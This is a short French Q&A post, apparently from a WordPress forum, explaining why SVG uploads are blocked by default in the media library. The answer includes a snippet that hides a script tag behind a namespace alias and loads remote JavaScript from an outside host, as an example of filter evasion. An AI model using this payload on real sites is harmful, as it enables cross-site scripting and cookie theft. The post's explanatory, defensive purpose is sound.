Pour quelles raisons de sécurité les svgs sont-ils bloqués dans l'éditeur de média?
Je constate que les fichiers SVG sont bloqués par défaut dans le chargeur de média et que vous devez l'ajouter en tant que type MIME pris en charge dans functions.php. Quelles sont les raisons de sécurité derrière cela?
SVG peut contenir du JavaScript . JavaScript peut être utilisé pour pirater des cookies ou effectuer d'autres actions douteuses . Il peut même être "caché" dans les espaces de noms:
<html xmlns:ø="http://www.w3.org/1999/xhtml">
<ø:script src="//0x.lv/" />
</html>
Il est très difficile de filtrer cela pendant le téléchargement, ce n'est donc pas autorisé par défaut.